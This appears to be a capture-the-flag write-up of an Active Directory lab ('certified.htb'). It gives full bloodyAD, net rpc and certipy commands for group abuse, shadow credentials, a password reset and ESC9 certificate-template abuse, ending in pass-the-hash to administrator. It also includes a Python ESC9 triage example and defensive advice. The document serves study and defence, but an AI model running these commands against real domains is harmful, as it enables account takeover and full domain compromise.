Foothold
1. Run BloodHound with a remote collector as judith.mader: judith.mader can modify the Management group, and Management has GenericWrite over management_svc.
Grant judith.mader GenericAll on the Management group with bloodyAD:
python3 ~/tools/windows/bloodyAD/bloodyAD.py --host certified.htb -d certified.htb -u judith.mader -p judith09 add genericAll Management judith.mader
Once judith.mader has write access to Management, add the account to the group (group membership is evaluated at authentication time, so it applies to every new logon from here on):
net rpc group addmem Management judith.mader -U judith.mader -S certified.htb
judith.mader now inherits Management's GenericWrite over management_svc. Abuse it with certipy's shadow credentials attack: it writes a key to msDS-KeyCredentialLink on management_svc, authenticates with the matching certificate via PKINIT and recovers the account's NT hash:
certipy shadow auto -u judith.mader@certified.htb -p judith09 -account management_svc
2. Pass the recovered NT hash of management_svc to psexec to get a foothold.
PrivEsc
1. management_svc has GenericAll over ca_operator.
2. Use that GenericAll to reset the password of ca_operator (set here to password123!).
3. Use certipy to find vulnerable templates in the context of ca_operator:
certipy find -u 'ca_operator@certified.htb' -p password123\! -dc-ip 10.129.244.229 -vulnerable
4. certipy abuse of the vulnerable template, CertifiedAuthentication. This is the ESC9 workflow: the template issues certificates without the szOID_NTDS_CA_SECURITY_EXT SID extension, so the DC maps the certificate to an account only by the UPN in it; set ca_operator's UPN to administrator, request a certificate, set the UPN back, and the certificate maps to the real administrator account.
Set ca_operator's userPrincipalName to administrator (management_svc has GenericAll over ca_operator; -hashes takes LM:NT, LM left as zeros):
certipy account update -username management_svc@certified.htb -hashes 00000000000000000000000000000000:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn administrator
Request a certificate from the vulnerable template as ca_operator; the certificate carries the current UPN, administrator, and certipy saves it as administrator.pfx:
certipy req -ca certified-DC01-CA -u 'ca_operator@certified.htb' -p password123\! -dc-ip 10.129.244.229 -template CertifiedAuthentication
Restore ca_operator's UPN; otherwise the DC would map the certificate's UPN back to ca_operator instead of the real administrator account:
certipy account update -username management_svc@certified.htb -hashes 00000000000000000000000000000000:a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator
Authenticate with the certificate (PKINIT) to get the administrator hash:
certipy auth -pfx administrator.pfx -dc-ip 10.129.244.229
5. Pass the administrator hash with psexec and get root.
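The PrivEsc steps above only work because the CertifiedAuthentication template meets the ESC9 preconditions. The following is an added example, not part of the writeup and not certipy's code: it reproduces the triage `certipy find -vulnerable` does for ESC9 over constructed template records, using the real AD CS LDAP attribute names, the real msPKI-Enrollment-Flag bit values and the real authentication EKU OIDs. The template records, the enrollment-rights lists and the group memberships are constructed for illustration (in AD the rights live in the template's nTSecurityDescriptor); the function and variable names are the example's own.

```python
"""ESC9 template triage over constructed AD CS template records (added example)."""

# msPKI-Enrollment-Flag bits (MS-CRTD). The first one is what makes ESC9 possible:
# issued certificates get no szOID_NTDS_CA_SECURITY_EXT, so no SID is embedded.
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002      # manager approval required
CT_FLAG_PUBLISH_TO_DS = 0x00000008          # harmless, used to make sample flags realistic

# EKU OIDs that let a certificate authenticate to the domain.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}

# HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement:
# 0 = disabled, 1 = compatibility, 2 = full enforcement. Only full enforcement
# rejects a certificate that lacks the SID extension, so ESC9 needs 0 or 1.
FULL_ENFORCEMENT = 2


def allows_auth(ekus):
    """An empty pKIExtendedKeyUsage means 'any purpose', which includes authentication."""
    return not ekus or bool(AUTH_EKUS & set(ekus))


def esc9_reasons(template, principal_groups, kdc_enforcement):
    """Return the preconditions that are NOT met. An empty list means the template is
    ESC9-exploitable by a principal in `principal_groups` (the attacker still needs
    write access to a victim account's userPrincipalName, as in the writeup)."""
    flags = template["msPKI-Enrollment-Flag"]
    missing = []
    if not flags & CT_FLAG_NO_SECURITY_EXTENSION:
        missing.append("security extension is included (SID is embedded)")
    if flags & CT_FLAG_PEND_ALL_REQUESTS:
        missing.append("manager approval required")
    if template["msPKI-RA-Signature"] > 0:
        missing.append("authorized signature required")
    if not allows_auth(template["pKIExtendedKeyUsage"]):
        missing.append("no authentication EKU")
    if not set(template["enroll"]) & set(principal_groups):
        missing.append("principal has no enrollment rights")
    if kdc_enforcement == FULL_ENFORCEMENT:
        missing.append("KDC is in full enforcement")
    return missing


def find_esc9(templates, principal_groups, kdc_enforcement):
    """Names of templates a principal could abuse for ESC9, sorted."""
    return sorted(t["name"] for t in templates
                  if not esc9_reasons(t, principal_groups, kdc_enforcement))


# Constructed sample data. Attribute names are the real LDAP attributes; values are made up,
# except that the first record is shaped like the template the writeup abuses.
SAMPLE_TEMPLATES = [
    {
        "name": "CertifiedAuthentication",
        "msPKI-Enrollment-Flag": CT_FLAG_NO_SECURITY_EXTENSION | CT_FLAG_PUBLISH_TO_DS,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll": ["CERTIFIED.HTB\\operator ca"],
    },
    {
        "name": "User",  # default-style template: SID extension present, so not ESC9
        "msPKI-Enrollment-Flag": CT_FLAG_PUBLISH_TO_DS,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4"],
        "enroll": ["CERTIFIED.HTB\\Domain Users"],
    },
    {
        "name": "ApprovedAuth",  # no SID extension, but a CA manager must approve
        "msPKI-Enrollment-Flag": CT_FLAG_NO_SECURITY_EXTENSION | CT_FLAG_PEND_ALL_REQUESTS,
        "msPKI-RA-Signature": 0,
        "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
        "enroll": ["CERTIFIED.HTB\\Domain Users"],
    },
]

# Constructed: groups ca_operator is assumed to belong to.
CA_OPERATOR_GROUPS = ["CERTIFIED.HTB\\Domain Users", "CERTIFIED.HTB\\operator ca"]

if __name__ == "__main__":
    for mode in (1, FULL_ENFORCEMENT):
        print(f"KDC enforcement={mode}: {find_esc9(SAMPLE_TEMPLATES, CA_OPERATOR_GROUPS, mode)}")
    for t in SAMPLE_TEMPLATES:
        print(t["name"], "->", esc9_reasons(t, CA_OPERATOR_GROUPS, 1) or "ESC9")
```

On a real domain, pull the template objects from CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=... (or from certipy's JSON output) and read the KDC registry value on each DC; the same template is exploitable in compatibility mode and dead once every DC is in full enforcement, which is the defensive fix alongside clearing the no-security-extension flag.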